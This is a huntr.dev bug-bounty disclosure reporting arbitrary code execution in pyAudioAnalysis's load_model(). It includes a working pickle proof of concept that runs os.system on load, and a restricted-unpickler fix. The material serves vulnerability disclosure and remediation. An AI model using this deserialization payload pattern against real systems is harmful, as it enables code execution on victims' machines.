huntr-helper
https://huntr.dev/users/d3m0n-r00t has fixed the Arbitrary Code Execution vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#2
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/other/pyAudioAnalysis/1/README.md

User Comments:

📊 Metadata *

Fixed Arbitrary code execution in pyAudioAnalysis

Bounty URL: https://www.huntr.dev/bounties/1-other-pyAudioAnalysis

⚙️ Description *

pyAudioAnalysis is an open Python library that provides a wide range of audio-related functionalities focusing on feature extraction, classification, segmentation and visualization issues. This package is vulnerable to Arbitrary Code Execution.

💻 Technical Description *

The function load_model() blindly loads a pickle file without any validation, making it vulnerable to Arbitrary Code Execution. If the input pickle file is a malicious payload, it can create a file remotely.

🐛 Proof of Concept (PoC) *

import pickle
import os
from pyAudioAnalysis import audioTrainTest as aT

class EvilPickle(object):
    def __reduce__(self):
        return (os.system, ('touch HACKED', ))

payload = pickle.dumps(EvilPickle())

with open('MEANS', 'wb') as file:
    file.write(payload)

aT.load_model('')

Screenshot 2021-01-08 092958

🔥 Proof of Fix (PoF) *

Screenshot 2021-01-08 093431

For subprocess
Screenshot 2021-01-08 094622

👍 User Acceptance Testing (UAT)

Applied the official pickle fix, as explained here:
https://www.cmi.ac.in/~madhavan/courses/python-2014/docs/python-3.2.1-docs-html/library/pickle.html
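The pickle documentation linked above describes restricting which globals an unpickler may resolve by overriding `Unpickler.find_class`. A sketch of that technique follows as an added example; it is not the code from this pull request. The allowlist contents, `restricted_loads`, `is_rejected` and the sample `CallsOnLoad` class are assumptions made for illustration, and a real model file may need further types allowlisted.

```python
import builtins
import io
import os
import pickle

# Assumption: the only globals a model file may reference. Plain containers,
# numbers and strings never reach find_class, so the list can stay small.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"),
                   ("builtins", "complex"), ("builtins", "range")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not on the allowlist."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Replacement for pickle.loads() when the bytes are untrusted."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class CallsOnLoad:
    """Constructed sample: same __reduce__ mechanism as the PoC, but the
    callable is the harmless os.getcwd, so the demo has no side effects."""

    def __reduce__(self):
        return (os.getcwd, ())


def is_rejected(data: bytes) -> bool:
    """True if the restricted unpickler refuses to load the data."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    # Constructed stand-in for model data: plain containers and numbers only.
    model = {"mean": [0.1, 0.2], "classes": ["speech", "music"], "win": 1.0}
    print("plain data loads:", restricted_loads(pickle.dumps(model)) == model)
    print("callable rejected:", is_rejected(pickle.dumps(CallsOnLoad())))
```

The rejection happens at the global lookup, before the callable named in `__reduce__` is ever invoked, which is why an allowlist is safer than trying to blocklist specific modules.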
